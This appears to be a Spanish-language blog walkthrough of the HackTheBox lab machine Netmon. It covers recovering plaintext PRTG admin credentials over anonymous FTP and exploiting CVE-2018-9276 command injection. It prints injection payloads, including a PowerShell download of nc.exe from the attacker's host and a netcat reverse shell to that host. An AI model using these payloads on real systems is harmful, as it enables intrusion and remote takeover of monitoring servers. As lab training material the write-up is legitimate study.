HTB Machine Walkthrough: Netmon


ESCRITO POR 1v4n

avatar  

Tiempo de lectura ~ 3 minutos

Nota del autor: Los conocimientos que os hemos intentado transmitir, están dirigidos a una práctica ética, si los usáis para prácticas no adecuadas ni en consonancia con la legislación seria únicamente responsabilidad vuestra o de vuestros tutores. No nos hacemos responsables del mal uso que se le pueda dar a las herramientas y habilidades que enseñemos.

{0x0} Introducción

Netmon es una máquina ubicada en HackTheBox que debemos vulnerar para conseguir las flags de usuario (user.txt) y root (root.txt) creada por mrb3n (miembro de equipo GuidePointSecurity) basada en Windows OS, os mostraremos los pasos que hemos dado.

{0x1} Reconocimiento

Antes de empezar ifconfig a nuestra máquina de pentesting Kali Linux comprobando la conexión con la VPN privada a través de openvpn --config 1v4n.ovpn asignándose la IP 10.10.14.192. Y comenzamos descubriendo nuestra dirección IP con ifconfig.

Y comprobamos que hay conexión con la máquina a vulnerar lanzado un ping -c 3.

{0x2} Escaneo

Realizamos un escaneo de puertos para comprobar los servicios que están abiertos y corriendo en la máquina a vulnerar con nmap -A 10.10.10.152.

Observamos abiertos los puertos con sus correspondientes servicios como el 21 (ftp), 80 (http), 135 (msrpc), 139 (netbios-ssn) y 445 (microsoft-ds) .

Detectamos la vulnerabilidad del servicio MS ftpd que nos permitirá loguearnos y listar directorios con las credenciales anonymous:anonymous

Además tenemos el servicio http(80) abierto y corriendo a Indy httpd 18.1.37.13946 servidor web del software Paessler PRTG bandwidth monitor.

Pasamos a configurar /etc/hosts añadiendo la línea 10.10.10.152 netmon.htb.

{0x3} Enumeración

Exploramos los directorios más interesantes vía ftp(21) y nos encontramos con el comando ls -la directorios interesantes como ProgramData, Windows y Users.

Descargamos con get del directorio de C:\Windows el archivo restart.bat, script que reinicia PRTG NM copiando el archivo PRTG Configutation.dat en el directorio C:\ProgramData\Paessler\PRTG Network Monitor.

Paessler PRTG se instala por defecto en %programdata%\Paessler\PRTG Network Monitor, donde almacena información como configuraciones y backups. Nos centraremos en los archivos PRTG Configuration.* que pueden contener información sobre usuarios.

Observamos en el archivo de respaldo realizado en la fecha 07/14/2018 de la configuración PRTG Configuration.dat.old.bak datos de un usuario que almacena sin ningún tipo de cifrado con las credenciales prtgadmin:PrTg@dmin2018 que no son válidas.

Examinamos el directorio de Users y nos percatamos que no somos administradores pero que sí tenemos acceso a la carpeta Public donde tenemos ubicado el archivo user.txt.

Nos centramos en el servicio http (80) enumerando directorios accesibles con la herramienta Dirhunt y HTTPie obteniendo la información de la versión de PRTG que es 18.1.37.13946 con un sistema de autentificación por login y la cuenta UA-154425-18 de Google Analytics.

PRTG NM en la máquina Netmon es vulnerable siempre que tengamos acceso a la consola web de administrador para explotar la vulnerabilidad de inyección de comandos del sistema operativo (RCE) CVE-2018-9276 y una denegación de servicio (DDoS) CVE-2018-10253

Según la información en PEASSLER probamos las credenciales por defecto en el login de la web de administración del PRTG NM (prtgadmin:prtgadmin) pero no son válidas.

Retomando las credenciales encontradas en el archivo de respaldo realizado en el año 2018 de la configuración del PRTG, probamos otras credenciales siendo el usuario admin prtgadmin y el algoritmo de la contraseña PrTg@dmin[Año]. Conseguimos la credencial válida a la administración web con prtgadmin:PrTg@dmin2019 ayudándonos de BurpSuite > Repeater.

{0x4} Acceso

Accedemos con éxito a /Users/Public/ y a través del comando get obtenemos user.txt.

Y conseguimos tener acceso a user.txt > dd58ce67b49e15105e88096c8d9255a5.

[!] Hash function : MD5 > 822722093

Pasamos a acceder a la administración web con las credenciales prtgadmin:PrTg@dmin2019 en la URL http://netmon.htb/public/login.html.

Ya autenticados nos movemos a Setup > Notifications > Email and push notification to admin.

Activando la opción Execute Program > Demo exe notification - outfile.ps1 > Ejecutamos un test introduciendo el siguiente script en Parameter text.txt; mkdir c:\users\public\testing > Save > Send test Notification.

Comprobamos a través de ftp (21) que se crea el directorio testing en C:\Users\Public y confirmamos que la vulnerabilidad CVE-2018-9276 está activa.

Decidimos volver a realizar un script, pero invocando al archivo root.txt que se encuentra ubicado en C:\Administrator\Desktop:

text.txt; Copy-item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\Users\Public\testing\1v4n.txt"

Y ahí está root.txt > 3018977fb944bf1878f75b879fba67cc

[!] Hash function : MD5 > 196851845

{0x5} Privesc

Aunque hemos obtenido las flags de user.txt y root.txt, a máquina Netmon la hemos comprometido pero no hemos podido tomar su control o realizar una Escalada de Privilegios (Privesc). Y nos ponemos a ello.

Hacemos un script invocando en Netmon a nc.exe (netcat) que hemos ubicado en un servidor web de la máquina atacante:

text.txt; powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.192:8080/nc.exe','C:\Users\Public\testing\nc.exe')"

Reubicamos en la máquina Netmon a nc.exe en el directorio de Administrator y lo ejecutamos:

text.txt; Copy-item "C:\Users\public\testing\nc.exe" -Destination "C:\Users\administrator\nc.exe"
test.txt; C:\users\administrator\desktop\nc.exe 10.10.14.192 4444 -e cmd.exe

Conseguimos tomar el control y de nuevo ahí está root.txt > 3018977fb944bf1878f75b879fba67cc

Quedada Octubre 2019

De nuevo nos reunimos para hablar de diversos temas de actualidad en el mundo de los derechos digitales, la lucha por el software libre y...… Continuar leyendo